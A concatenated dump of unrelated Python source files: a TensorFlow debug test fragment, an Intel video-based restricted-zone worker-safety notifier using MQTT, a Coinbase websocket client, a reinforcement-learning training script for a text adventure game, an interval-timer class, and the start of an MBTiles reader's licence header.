def testWrapperThreadNameFilterBothThreads(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=None)
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertEqual(2, dump.size)
self.assertItemsEqual(
["a_init", "b_init"],
[datum.node_name for datum in dump.dumped_tensor_data])
if __name__ == "__main__":
googletest.main()
|
restricted_zone_notifier.py | """Restricted Zone Notifier."""
"""
Copyright (c) 2018 Intel Corporation.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import os
import sys
import json
import time
import socket
import cv2
import logging as log
import paho.mqtt.client as mqtt
from threading import Thread
from collections import namedtuple
from argparse import ArgumentParser
from inference import Network
# Assemblyinfo contains information about assembly area
MyStruct = namedtuple("assemblyinfo", "safe")
INFO = MyStruct(True)
# MQTT server environment variables
HOSTNAME = socket.gethostname()
IPADDRESS = socket.gethostbyname(HOSTNAME)
TOPIC = "Restricted_zone_python"
MQTT_HOST = IPADDRESS
MQTT_PORT = 1883
MQTT_KEEPALIVE_INTERVAL = 60
# Global variables
TARGET_DEVICE = 'CPU'
accepted_devices = ['CPU', 'GPU', 'MYRIAD', 'HETERO:FPGA,CPU', 'HDDL']
is_async_mode = True
CONFIG_FILE = '../resources/config.json'
# Flag to control background thread
KEEP_RUNNING = True
DELAY = 5
def build_argparser():
"""
Parse command line arguments.
:return: Command line arguments
"""
parser = ArgumentParser()
parser.add_argument("-m", "--model", required=True, type=str,
help="Path to an .xml file with a trained model.")
parser.add_argument("-l", "--cpu_extension", type=str, default=None,
help="MKLDNN (CPU)-targeted custom layers. Absolute "
"path to a shared library with the kernels impl.")
parser.add_argument("-d", "--device", default="CPU", type=str,
help="Specify the target device to infer on; "
"CPU, GPU, FPGA, HDDL, MYRIAD is acceptable. To run with multiple devices use "
"MULTI:<device1>,<device2>,etc. Application "
"will look for a suitable plugin for device specified"
"(CPU by default)")
parser.add_argument("-th", "--prob_threshold", default=0.5, type=float,
help="Probability threshold for detections filtering")
parser.add_argument('-x', '--pointx', default=0, type=int,
help="X coordinate of the top left point of assembly"
" area on camera feed.")
parser.add_argument('-y', '--pointy', default=0, type=int,
help="Y coordinate of the top left point of assembly"
" area on camera feed.")
parser.add_argument('-w', '--width', default=0, type=int,
help="Width of the assembly area in pixels.")
parser.add_argument('-ht', '--height', default=0, type=int,
help="Height of the assembly area in pixels.")
parser.add_argument('-r', '--rate', default=1, type=int,
help="Number of seconds between data updates "
"to MQTT server")
parser.add_argument("-f", "--flag", help="sync or async", default="async", type=str)
global TARGET_DEVICE, is_async_mode
args = parser.parse_args()
if args.device:
TARGET_DEVICE = args.device
if args.flag == "sync":
is_async_mode = False
else:
is_async_mode = True
return parser
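# Illustrative invocation sketch (the model path and ROI values below are placeholders,
# not tested commands); all flags correspond to the arguments defined above:
#   python3 restricted_zone_notifier.py -m /path/to/person-detection.xml \
#       -d CPU -x 100 -y 120 -w 400 -ht 300 -r 2 -f async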
def check_args():
# ArgumentParser checks the device
global TARGET_DEVICE
if 'MULTI' not in TARGET_DEVICE and TARGET_DEVICE not in accepted_devices:
print("Unsupported device: " + TARGET_DEVICE)
sys.exit(2)
elif 'MULTI' in TARGET_DEVICE:
target_devices = TARGET_DEVICE.split(':')[1].split(',')
for multi_device in target_devices:
if multi_device not in accepted_devices:
print("Unsupported device: " + TARGET_DEVICE)
sys.exit(2)
def ssd_out(res, args, initial_wh, selected_region):
"""
Parse SSD output.
:param res: Detection results
:param args: Parsed arguments
:param initial_wh: Initial width and height of the frame
:param selected_region: Selected region coordinates
:return: None
"""
global INFO
person = []
INFO = INFO._replace(safe=True)
for obj in res[0][0]:
# Draw objects only when probability is more than specified threshold
if obj[2] > args.prob_threshold:
xmin = int(obj[3] * initial_wh[0])
ymin = int(obj[4] * initial_wh[1])
xmax = int(obj[5] * initial_wh[0])
ymax = int(obj[6] * initial_wh[1])
person.append([xmin, ymin, xmax, ymax])
for p in person:
# area_of_person gives area of the detected person
area_of_person = (p[2] - p[0]) * (p[3] - p[1])
x_max = max(p[0], selected_region[0])
x_min = min(p[2], selected_region[0] + selected_region[2])
y_min = min(p[3], selected_region[1] + selected_region[3])
y_max = max(p[1], selected_region[1])
point_x = x_min - x_max
point_y = y_min - y_max
# area_of_intersection gives area of intersection of the
# detected person and the selected area
area_of_intersection = point_x * point_y
if point_x < 0 or point_y < 0:
continue
else:
if area_of_person > area_of_intersection:
# assembly line area flags
INFO = INFO._replace(safe=True)
else:
# assembly line area flags
INFO = INFO._replace(safe=False)
def message_runner():
"""
Publish worker status to MQTT topic.
Pauses for one second between updates.
:return: None
"""
while KEEP_RUNNING:
time.sleep(1)
CLIENT.publish(TOPIC, payload=json.dumps({"Worker safe": INFO.safe,
"Alert": not INFO.safe}))
def main():
"""
Load the network and parse the output.
:return: None
"""
global DELAY
global CLIENT
global SIG_CAUGHT
global KEEP_RUNNING
global TARGET_DEVICE
global is_async_mode
CLIENT = mqtt.Client()
CLIENT.connect(MQTT_HOST, MQTT_PORT, MQTT_KEEPALIVE_INTERVAL)
CLIENT.subscribe(TOPIC)
log.basicConfig(format="[ %(levelname)s ] %(message)s",
level=log.INFO, stream=sys.stdout)
args = build_argparser().parse_args()
logger = log.getLogger()
render_time = 0
roi_x = args.pointx
roi_y = args.pointy
roi_w = args.width
roi_h = args.height
check_args()
assert os.path.isfile(CONFIG_FILE), "{} file doesn't exist".format(CONFIG_FILE)
config = json.loads(open(CONFIG_FILE).read())
for idx, item in enumerate(config['inputs']):
if item['video'].isdigit():
input_stream = int(item['video'])
else:
input_stream = item['video']
cap = cv2.VideoCapture(input_stream)
if not cap.isOpened():
logger.error("ERROR! Unable to open video source")
sys.exit(1)
# Init inference request IDs
cur_request_id = 0
next_request_id = 1
# Initialise the class
infer_network = Network()
# Load the network to IE plugin to get shape of input layer
n, c, h, w = infer_network.load_model(args.model, TARGET_DEVICE, 1, 1, 2, args.cpu_extension)[1]
message_thread = Thread(target=message_runner, args=())
message_thread.setDaemon(True)
message_thread.start()
if is_async_mode:
print("Application running in async mode...")
else:
print("Application running in sync mode...")
ret, frame = cap.read()
while ret:
ret, next_frame = cap.read()
if not ret:
KEEP_RUNNING = False
break
initial_wh = [cap.get(3), cap.get(4)]
if next_frame is None:
KEEP_RUNNING = False
log.error("ERROR! blank FRAME grabbed")
break
# If either default values or negative numbers are given,
# then we will default to start of the FRAME
if roi_x <= 0 or roi_y <= 0:
roi_x = 0
roi_y = 0
if roi_w <= 0:
roi_w = next_frame.shape[1]
if roi_h <= 0:
roi_h = next_frame.shape[0]
key_pressed = cv2.waitKey(1)
# 'c' key pressed
if key_pressed == 99:
# Give the operator a chance to change the area
# Select the rectangle from its top-left corner (not from the center)
ROI = cv2.selectROI("Assembly Selection", frame, True, False)
print("Assembly Area Selection: -x = {}, -y = {}, -w = {},"
" -h = {}".format(ROI[0], ROI[1], ROI[2], ROI[3]))
roi_x = ROI[0]
roi_y = ROI[1]
roi_w = ROI[2]
roi_h = ROI[3]
cv2.destroyAllWindows()
cv2.rectangle(frame, (roi_x, roi_y),
(roi_x + roi_w, roi_y + roi_h), (0, 0, 255), 2)
selected_region = [roi_x, roi_y, roi_w, roi_h]
in_frame_fd = cv2.resize(next_frame, (w, h))
# Change data layout from HWC to CHW
in_frame_fd = in_frame_fd.transpose((2, 0, 1))
in_frame_fd = in_frame_fd.reshape((n, c, h, w))
# Start asynchronous inference for specified request.
inf_start = time.time()
if is_async_mode:
# Async enabled and only one video capture
infer_network.exec_net(next_request_id, in_frame_fd)
else:
# Async disabled
infer_network.exec_net(cur_request_id, in_frame_fd)
# Wait for the result
infer_network.wait(cur_request_id)
det_time = time.time() - inf_start
# Results of the output layer of the network
res = infer_network.get_output(cur_request_id)
# Parse SSD output
ssd_out(res, args, initial_wh, selected_region)
# Draw performance stats
inf_time_message = "Inference time: N\A for async mode" if is_async_mode else \
"Inference time: {:.3f} ms".format(det_time * 1000)
render_time_message = "OpenCV rendering time: {:.3f} ms". \
format(render_time * 1000)
if not INFO.safe:
warning = "HUMAN IN ASSEMBLY AREA: PAUSE THE MACHINE!"
cv2.putText(frame, warning, (15, 100), cv2.FONT_HERSHEY_COMPLEX, 0.8, (0, 0, 255), 2)
log_message = "Async mode is on." if is_async_mode else \
"Async mode is off."
cv2.putText(frame, log_message, (15, 15), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, inf_time_message, (15, 35), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, render_time_message, (15, 55), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
cv2.putText(frame, "Worker Safe: {}".format(INFO.safe), (15, 75), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 255), 1)
render_start = time.time()
cv2.imshow("Restricted Zone Notifier", frame)
render_end = time.time()
render_time = render_end - render_start
frame = next_frame
if key_pressed == 27:
print("Attempting to stop background threads")
KEEP_RUNNING = False
break
# Tab key pressed
if key_pressed == 9:
is_async_mode = not is_async_mode
print("Switched to {} mode".format("async" if is_async_mode else "sync"))
if is_async_mode:
# Swap infer request IDs
cur_request_id, next_request_id = next_request_id, cur_request_id
infer_network.clean()
message_thread.join()
cap.release()
cv2.destroyAllWindows()
CLIENT.disconnect()
if __name__ == '__main__':
main()
|
websocket_client.py | # cbpro/WebsocketClient.py
# original author: Daniel Paquin
# mongo "support" added by Drew Rice
#
#
# Template object to receive messages from the Coinbase Websocket Feed
from __future__ import print_function
import json
import base64
import hmac
import hashlib
import time
from threading import Thread
from websocket import create_connection, WebSocketConnectionClosedException
from pymongo import MongoClient
from cbpro.cbpro_auth import get_auth_headers
class WebsocketClient(object):
def __init__(self, url="wss://ws-feed.pro.coinbase.com", products=None, message_type="subscribe", mongo_collection=None,
should_print=True, auth=False, api_key="", api_secret="", api_passphrase="", channels=None):
self.url = url
self.products = products
self.channels = channels
self.type = message_type
self.stop = True
self.error = None
self.ws = None
self.thread = None
self.auth = auth
self.api_key = api_key
self.api_secret = api_secret
self.api_passphrase = api_passphrase
self.should_print = should_print
self.mongo_collection = mongo_collection
def start(self):
def _go():
self._connect()
self._listen()
self._disconnect()
self.stop = False
self.on_open()
self.thread = Thread(target=_go)
self.thread.start()
def _connect(self):
if self.products is None:
self.products = ["BTC-USD"]
elif not isinstance(self.products, list):
self.products = [self.products]
if self.url[-1] == "/":
self.url = self.url[:-1]
if self.channels is None:
sub_params = {'type': 'subscribe', 'product_ids': self.products}
else:
sub_params = {'type': 'subscribe', 'product_ids': self.products, 'channels': self.channels}
if self.auth:
timestamp = str(time.time())
message = timestamp + 'GET' + '/users/self/verify'
auth_headers = get_auth_headers(timestamp, message, self.api_key, self.api_secret, self.api_passphrase)
sub_params['signature'] = auth_headers['CB-ACCESS-SIGN']
sub_params['key'] = auth_headers['CB-ACCESS-KEY']
sub_params['passphrase'] = auth_headers['CB-ACCESS-PASSPHRASE']
sub_params['timestamp'] = auth_headers['CB-ACCESS-TIMESTAMP']
self.ws = create_connection(self.url)
self.ws.send(json.dumps(sub_params))
def _listen(self):
start_t = time.time()
while not self.stop:
try:
if time.time() - start_t >= 30:
# Send a ping roughly every 30 seconds to keep the connection alive
self.ws.ping("keepalive")
start_t = time.time()
data = self.ws.recv()
msg = json.loads(data)
except ValueError as e:
self.on_error(e)
except Exception as e:
self.on_error(e)
else:
self.on_message(msg)
def _disconnect(self):
try:
if self.ws:
self.ws.close()
except WebSocketConnectionClosedException as e:
pass
self.on_close()
def close(self):
self.stop = True
self.thread.join()
def on_open(self):
if self.should_print:
print("-- Subscribed! --\n")
def on_close(self):
if self.should_print:
print("\n-- Socket Closed --")
def on_message(self, msg):
if self.should_print:
print(msg)
if self.mongo_collection: # dump JSON to given mongo collection
self.mongo_collection.insert_one(msg)
def on_error(self, e, data=None):
self.error = e
self.stop = True
print('{} - data: {}'.format(e, data))
if __name__ == "__main__":
import sys
import cbpro
import time
class MyWebsocketClient(cbpro.WebsocketClient):
def on_open(self):
self.url = "wss://ws-feed.pro.coinbase.com/"
self.products = ["BTC-USD", "ETH-USD"]
self.message_count = 0
print("Let's count the messages!")
def on_message(self, msg):
print(json.dumps(msg, indent=4, sort_keys=True))
self.message_count += 1
def on_close(self):
print("-- Goodbye! --")
wsClient = MyWebsocketClient()
wsClient.start()
print(wsClient.url, wsClient.products)
try:
while True:
print("\nMessageCount =", "%i \n" % wsClient.message_count)
time.sleep(1)
except KeyboardInterrupt:
wsClient.close()
if wsClient.error:
sys.exit(1)
else:
sys.exit(0)
|
emtbg.py | import pickle
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
import torch.utils.data
import torch.multiprocessing as mp
import os.path
import os
import sys
import time
from operator import itemgetter
import six
assert six.PY3
from env import Game
from utils import props, notify
import jingweiz
###### CONFIG #########
max_episodes = 1000
disable_curriculum = False
target_q_ts = 60 * 5
test_epsilon = 0
test_text = False
learning_rate = 5e-4
#epsilon = 0.2
epsilon1 = 0.5
epsilon2 = 0.1
save_every = 60 * 10
notify_every = 60 * 10
#gamma = 0.5
gamma = 0.9
name="weights.pkl"
name_stats="stats.pkl"
n_cpu = int(mp.cpu_count()) // 2
n_cpu = 60
#######################
embedding_dim = 20
hidden_size = 20
hidden_size2 = 20
Net = None
class Net_dnc(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_dnc, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
class Empty():
use_cuda = False
dtype = torch.FloatTensor
args = Empty()
args.batch_size = 1
args.input_dim = hidden_size
args.output_dim = hidden_size
args.hidden_dim = 64
args.num_write_heads = 1
args.num_read_heads = 4
args.mem_hei = 16
args.mem_wid = 16
args.clip_value = 20.
args.controller_params = Empty()
args.accessor_params = Empty()
args.accessor_params.write_head_params = Empty()
args.accessor_params.write_head_params.num_allowed_shifts = 3
args.accessor_params.read_head_params = Empty()
args.accessor_params.read_head_params.num_allowed_shifts = 3
args.accessor_params.memory_params = Empty()
self.circuit = jingweiz.DNCCircuit(args)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.circuit._reset()
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x4b = self.circuit(x4)
x4b = x4b.view((1,-1))
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
class Net_none(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_none, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.linear = nn.Linear(hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
pass
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x5 = F.relu(self.linear(x4))
return self.objects(x5)
class Net_avg(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_avg, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.avg = np.zeros((1, hidden_size))
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
x4b = Variable(torch.Tensor(self.avg))
self.avg = self.avg + x4.data.numpy()
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
class Net_lstm(nn.Module):
def __init__(self, num_symbols, num_actions, num_objects):
super(Net_lstm, self).__init__()
self.num_symbols = num_symbols
self.embedding = nn.Embedding(num_symbols, embedding_dim)
self.lstm = nn.LSTM(embedding_dim, hidden_size, num_layers=1, batch_first=True)
self.cell = nn.LSTMCell(hidden_size, hidden_size)
self.linear = nn.Linear(hidden_size + hidden_size, hidden_size2)
self.objects = nn.Linear(hidden_size2, num_objects)
def reset(self):
self.cx = Variable(torch.Tensor(np.zeros((1, hidden_size))))
self.hx = Variable(torch.Tensor(np.zeros((1, hidden_size))))
def forward(self, x):
x = x - 1
x2 = self.embedding(x)
mask = x != self.num_symbols - 1
mask = mask.float()
mask = mask.unsqueeze(2)
x2 = x2 * mask
x3, _ = self.lstm(x2)
x4 = torch.sum(x3, 1)
self.hx, self.cx = self.cell(x4, (self.hx, self.cx))
x4b = self.hx
#x4b = x4b.view((1,-1))
x4c = torch.cat((x4, x4b), 1)
x5 = F.relu(self.linear(x4c))
return self.objects(x5)
def train(net, rank):
torch.set_num_threads(1) #also do: export MKL_NUM_THREADS=1
net.reset()
env = Game(True, 4000 + rank + 1, max_steps=250)
target_net = Net(1254, 6, 36)
target_net.load_state_dict(net.state_dict())
target_net.reset()
epsilon = epsilon1
optimizer = optim.RMSprop(net.parameters(), lr=learning_rate)
last_save = time.time()
last_notify = time.time()
last_sync = time.time()
episode_number = 0
terminal = True
prev_value = None
available_objects = None
num_objects = len(env.objects)
recent_rewards_of_episodes = []
recent_steps_of_episodes = []
quest1_reward_cnt = 0
quest2_reward_cnt = 0
quest3_reward_cnt = 0
quest4_reward_cnt = 0
quest1_rewards = np.zeros(100)
quest2_rewards = np.zeros(100)
quest3_rewards = np.zeros(100)
quest4_rewards = np.zeros(100)
if rank == 0:
stats = []
while True:
if terminal:
student_saw_obelisk = False
quest1_rewards[episode_number % len(quest1_rewards)] = 0
quest2_rewards[episode_number % len(quest2_rewards)] = 0
quest3_rewards[episode_number % len(quest3_rewards)] = 0
quest4_rewards[episode_number % len(quest4_rewards)] = 0
prev_value = None
num_steps = 0
net.reset()
target_net.reset()
state, reward, terminal, available_objects = env.reset()
sum_rewards = reward
state = torch.LongTensor(state)
objects_probs = net(Variable(state.unsqueeze(0)))
_objects_probs = objects_probs.data.numpy()
#Choose action
if random.random() < epsilon:
if available_objects is None:
objects = list(enumerate(env.objects))
else:
objects = [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects]
_object = random.choice(objects)[0]
else:
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
_objects_probs = objects_probs.data.numpy() * mask
_objects_probs = _objects_probs + (_objects_probs == 0) * -1e30
_object = int(np.argmax(_objects_probs))
prev_value = objects_probs[0, _object]
# step the environment and get new measurements
state, reward, terminal, available_objects = env.step(5, _object)
sum_rewards += reward
num_steps += 1
if reward > 10 - 0.0001:
quest4_reward_cnt = quest4_reward_cnt + 1
quest4_rewards[episode_number % len(quest4_rewards)] = 1
elif reward > 8 - 0.0001:
quest3_reward_cnt = quest3_reward_cnt + 1
quest3_rewards[episode_number % len(quest3_rewards)] = 1
if not disable_curriculum:
if not student_saw_obelisk:
reward = -8
terminal = True
elif reward > 7 - 0.0001:
student_saw_obelisk = True
quest2_reward_cnt = quest2_reward_cnt + 1
quest2_rewards[episode_number % len(quest2_rewards)] = 1
if not disable_curriculum:
if np.mean(quest2_rewards) < 0.75 and random.random() < 0.9:
terminal = True
elif reward > 5 - 0.0001:
quest1_reward_cnt = quest1_reward_cnt + 1
quest1_rewards[episode_number % len(quest1_rewards)] = 1
if not disable_curriculum:
if np.mean(quest1_rewards) < 0.9 and random.random() < 0.85:
terminal = True
if 2 * epsilon > (epsilon1 + epsilon2):
if np.mean(quest3_rewards) > .98:
if np.mean(quest2_rewards) > .98:
if np.mean(quest1_rewards) > .98:
epsilon = epsilon2
if rank == 0:
notify("Epsilon is now:" + str(epsilon))
if terminal:
next_value = 0
else:
if target_q_ts is None:
next_value = float(np.max(_objects_probs))
else:
state = torch.LongTensor(state)
objects_probs = target_net(Variable(state.unsqueeze(0)))
_objects_probs = objects_probs.data.numpy()
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
_objects_probs = _objects_probs * mask
_objects_probs = _objects_probs + (_objects_probs == 0) * -1e30
next_value = float(np.max(_objects_probs))
loss = (reward + gamma * next_value - prev_value) ** 2
#Update for important steps, plus a small fraction (5%) of the others
if abs(reward) > 4 or random.random() < 0.05:
optimizer.zero_grad()
loss.backward(retain_graph=True)
nn.utils.clip_grad_norm(net.parameters(), 1)
optimizer.step()
if terminal:
recent_rewards_of_episodes.append(sum_rewards)
recent_steps_of_episodes.append(num_steps)
if len(recent_rewards_of_episodes) > 100:
recent_rewards_of_episodes.pop(0)
if len(recent_steps_of_episodes) > 100:
recent_steps_of_episodes.pop(0)
episode_number += 1
if target_q_ts is not None and time.time() - last_sync > target_q_ts:
if rank == 0:
print("Update target")
target_net.load_state_dict(net.state_dict())
last_sync = time.time()
if rank == 0:
stats.append({})
stats[-1]["episode_number"] = episode_number
stats[-1]["sum_rewards"] = sum_rewards
stats[-1]["num_steps"] = num_steps
stats[-1]["mean_recent_rewards_of_episodes"] = np.mean(recent_rewards_of_episodes)
stats[-1]["mean_recent_steps_of_episodes"] = np.mean(recent_steps_of_episodes)
stats[-1]["quest1_reward_cnt"] = quest1_reward_cnt
stats[-1]["quest2_reward_cnt"] = quest2_reward_cnt
stats[-1]["quest3_reward_cnt"] = quest3_reward_cnt
stats[-1]["quest4_reward_cnt"] = quest4_reward_cnt
stats[-1]["mean_quest1_rewards"] = np.mean(quest1_rewards)
stats[-1]["mean_quest2_rewards"] = np.mean(quest2_rewards)
stats[-1]["mean_quest3_rewards"] = np.mean(quest3_rewards)
stats[-1]["mean_quest4_rewards"] = np.mean(quest4_rewards)
summary = "{} {:.4} {} {:.4} {:.4} Qc: {} {} {} {} Q: {} {} {} {}".format(episode_number, sum_rewards, num_steps, np.mean(recent_rewards_of_episodes), np.mean(recent_steps_of_episodes), quest1_reward_cnt, quest2_reward_cnt, quest3_reward_cnt, quest4_reward_cnt, np.mean(quest1_rewards), np.mean(quest2_rewards), np.mean(quest3_rewards), np.mean(quest4_rewards))
print(summary)
if save_every is not None:
if time.time() - last_save > save_every:
print("Saving..")
torch.save(net.state_dict(), name)
with open(name_stats, "wb") as _fh:
pickle.dump(stats, _fh)
last_save = time.time()
if notify_every is not None:
if time.time() - last_notify > notify_every:
print("Notify..")
notify(summary)
last_notify = time.time()
if max_episodes is not None and episode_number == max_episodes:
torch.save(net.state_dict(), name)
with open(name_stats, "wb") as _fh:
pickle.dump(stats, _fh)
notify(summary)
notify("Done.")
print("Done.")
sys.exit()
def test(net, env, is_tutorial_world):
num_objects = len(env.objects)
quest4_reward_cnt = 0
quest3_reward_cnt = 0
quest2_reward_cnt = 0
quest1_reward_cnt = 0
total_reward = 0
nrewards = 0
nepisodes = 0
episode_reward = 0
total_steps = 0
num_step = 0
terminal = True
available_objects = None
while True:
if terminal:
num_step = 0
if test_text:
print("Press enter to start new game:")
input()
net.reset()
state, reward, terminal, available_objects = env.reset()
if test_text:
print(env.state2text(state, reward))
state = torch.LongTensor(state)
objects_probs = net(Variable(state.unsqueeze(0)))
if test_text:
print("Actions:", list(enumerate(env.actions)))
if available_objects is None:
print("Objects:", list(enumerate(env.objects)))
else:
print("Objects:", [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects])
#Choose action
if random.random() < test_epsilon:
actions = list(enumerate(env.actions))
if available_objects is None:
objects = list(enumerate(env.objects))
else:
objects = [_ for _ in list(enumerate(env.objects)) if _[0] in available_objects]
_action = 5
_object = random.choice(objects)[0]
if test_text:
print(">>> " + str(_action) + "." + env.actions[_action] + " " + str(_object) + "." + env.objects[_object] + " [random choice]")
else:
_action = 5
if available_objects is not None:
mask = np.zeros(num_objects)
for e in available_objects:
mask[e] = 1
mask = torch.Tensor(mask)
mask = mask.unsqueeze(0)
mask = Variable(mask)
objects_probs = objects_probs * mask
objects_probs = objects_probs + (objects_probs == 0).float() * -1e30
_object = int(np.argmax(objects_probs.data.numpy()))
if test_text:
print("["+str(num_step)+"]>>> " + str(_action) + "." + env.actions[_action] + " " + str(_object) + "." + env.objects[_object])
print()
state, reward, terminal, available_objects = env.step(_action, _object)
if test_text:
print(env.state2text(state, reward))
total_steps += 1
num_step += 1
if is_tutorial_world:
if reward > 10 - 0.0001:
quest4_reward_cnt = quest4_reward_cnt + 1
elif reward > 8 - 0.0001:
quest3_reward_cnt = quest3_reward_cnt + 1
elif reward > 7 - 0.0001:
quest2_reward_cnt = quest2_reward_cnt + 1
elif reward > 5 - 0.0001:
quest1_reward_cnt = quest1_reward_cnt + 1
else:
if reward > 0.9:
quest1_reward_cnt = quest1_reward_cnt + 1
episode_reward = episode_reward + reward
if reward != 0:
nrewards = nrewards + 1
if terminal:
total_reward = total_reward + episode_reward
episode_reward = 0
nepisodes = nepisodes + 1
if is_tutorial_world:
print(nepisodes, "avg steps:", total_steps / nepisodes, "avg reward:", total_reward / nepisodes, "Q1:", quest1_reward_cnt / nepisodes, "Q2:", quest2_reward_cnt / nepisodes, "Q3:", quest3_reward_cnt / nepisodes, "Q4:", quest4_reward_cnt / nepisodes)
else:
print(nepisodes, "avg steps:", total_steps / nepisodes, "avg reward:", total_reward / nepisodes, "Q1:", quest1_reward_cnt / nepisodes)
if nepisodes == max_episodes:
sys.exit()
def main():
global Net
#global epsilon
global n_cpu
global test_text
port = 4001
test_mode = False
Net = Net_dnc
if len(sys.argv) > 1:
cmd = sys.argv[1]
for c in list(cmd):
if c == 't':
test_mode = True
elif c == 'T':
test_mode = True
test_text = True
elif c == 'p':
port = int(sys.argv[2])
print("port:", port)
#elif c == 'e':
# epsilon = float(sys.argv[2])
# print("epsilon:", epsilon)
elif c == 'd':
Net = Net_dnc
elif c == 'l':
Net = Net_lstm
elif c == 'a':
Net = Net_avg
elif c == 'n':
Net = Net_none
elif c == '1':
n_cpu = 1
print("Using:", Net)
#net = Net(len(env.symbols), len(env.actions), len(env.objects))
net = Net(1254, 6, 36)
#Try to load from file
if os.path.isfile(name):
print("Loading from file..")
net.load_state_dict(torch.load(name))
if not test_mode:
net.share_memory()
processes = []
for rank in range(n_cpu):
p = mp.Process(target=train, args=(net, rank))
p.start()
processes.append(p)
for p in processes:
p.join()
else:
env = Game(True, port, max_steps=250)
test(net, env, True)
if __name__ == "__main__":
main()
|
Set.py | import logging
import threading
import time
log = logging.getLogger(__name__)
class Interval:
"""A class that loops every interval."""
def __init__(self, interval, action, id=None) -> None:
"""Initialize the interval loop.
Args:
interval (float): The interval in seconds.
action (function): The action to do.
"""
self.interval = interval
self.action = action
self.id = id
self.stop = threading.Event()
thread = threading.Thread(target=self._setInterval)
thread.start()
def _setInterval(self) -> None:
"""Does things."""
next = time.time() + self.interval
while not self.stop.wait(next - time.time()):
next += self.interval
try:
self.action(self.id)
except OSError as e:
log.exception(e)
pass
def cancel(self) -> None:
"""Cancels the interval."""
self.stop.set()
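# Minimal usage sketch (the callback name and timings are placeholders):
#   def tick(interval_id):
#       print("tick from", interval_id)
#   loop = Interval(1.0, tick, id="demo")
#   time.sleep(3.5)
#   loop.cancel()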
|
mbtiles_reader.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2020 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
